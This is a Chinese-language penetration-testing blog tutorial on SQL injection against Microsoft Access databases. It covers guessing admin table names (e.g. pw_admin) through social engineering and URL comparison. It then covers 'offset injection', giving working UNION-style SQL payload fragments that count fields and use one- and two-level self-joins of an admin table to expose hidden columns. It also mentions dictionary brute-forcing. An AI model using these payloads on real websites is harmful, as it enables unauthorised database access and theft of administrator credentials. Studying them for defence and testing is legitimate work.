Access 常见复杂及问题注入

表名，列名无法获取
1、社工，对比网站url
www.xxx.com/pw_news.asp
表名：pw_admin,pw_manage,pw_system

2、列名无法获取
access偏移注入，社工，后台源码中参数名

工具制作原理：

字典爆破，逐字猜解

偏移注入：表名知道即可

1、用 “*” 代替字段，

select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 逐个删除，* 可以看作字段数

* = 6个字符
2 x * = 12字符
22 – 12=10 字符

若在减6个还是不出现

添加一句：from (admin as a inner join admin as b on a.id=b.id)（一级注入）

一级偏移

select 1,2,3,4,5,6,7,8,9,10 from (admin as a inner join admin as b on a.id=b.id)

二级偏移

select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

------本页内容已结束，喜欢请分享------

感谢您的来访，获取更多精彩文章请收藏本站。

文章版权声明 1、本网站名称：使者云
2、本站永久网址：https://i58.icu
3、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ29523472进行删除处理。
4、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

知识丨教程计算机技术
# 工具 # 代码 # 漏洞 # 源码 # 密码 # 渗透 # 注入 # SQL # mysql # SQL注入 # msssql